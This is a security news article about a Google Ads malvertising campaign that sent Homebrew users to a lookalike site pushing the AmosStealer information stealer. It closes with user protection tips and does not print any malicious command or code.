Cybercriminals are leveraging Google Ads to distribute malware, targeting Mac and Linux users by redirecting them to a fake Homebrew website designed to deploy an information stealer. This malware campaign, utilizing a tool known as AmosStealer (or Atomic), highlights the growing sophistication of malvertising techniques.
The Malware Campaign in Detail
- Target Audience: Mac and Linux users, specifically those seeking to download Homebrew, a widely used open-source package manager.
- How It Works: Hackers create deceptive Google Ads, displaying the legitimate Homebrew URL (“brew.sh”). However, users are redirected to a fake site (“brewe.sh”), which mimics the official Homebrew website.
- Malware Installation: The fake site instructs users to run a terminal command, which instead of installing Homebrew, deploys the AmosStealer malware.
- Stolen Data: AmosStealer is capable of extracting credentials, browser data, and information from over 50 cryptocurrency extensions and wallets.
Discovery and Expert Alerts
- Security expert Ryan Chenkie discovered the campaign and warned about its potential risks.
- Researcher JAMESWT identified Amos as the malware in question, describing it as a potent tool sold on a subscription basis for $1,000 per month.
Homebrew’s Response
Homebrew’s project leader, Mike McQuaid, expressed frustration over Google’s handling of malvertising:
“This seems taken down now. But it keeps happening again and again, and Google appears to prioritize revenue from scammers.”
While the malicious ad has been removed, the threat persists as hackers can employ other redirection domains.
How to Protect Yourself
- Verify URLs: Always ensure that you are visiting the official Homebrew website (brew.sh) or any other trusted project.
- Avoid Sponsored Ads: Refrain from clicking on Google-sponsored ads for software downloads.
- Bookmark Trusted Websites: Access official websites directly by bookmarking them.
- Inspect Terminal Commands: Double-check any command before executing it in your Terminal or shell prompt.
- Use Antivirus Software: Keep your system protected with updated antivirus solutions.
- Stay Informed: Be aware of the latest malvertising campaigns and share alerts to prevent others from falling victim.
The Bigger Picture: Malvertising Risks
This incident is part of a broader trend where cybercriminals exploit Google Ads to direct unsuspecting users to fake websites. Despite Google’s efforts to combat malicious ads, loopholes remain that scammers exploit.
By raising awareness and practicing caution, users can protect themselves from falling victim to these scams. Sharing incidents like this widely is crucial to pressuring platforms to strengthen their security measures.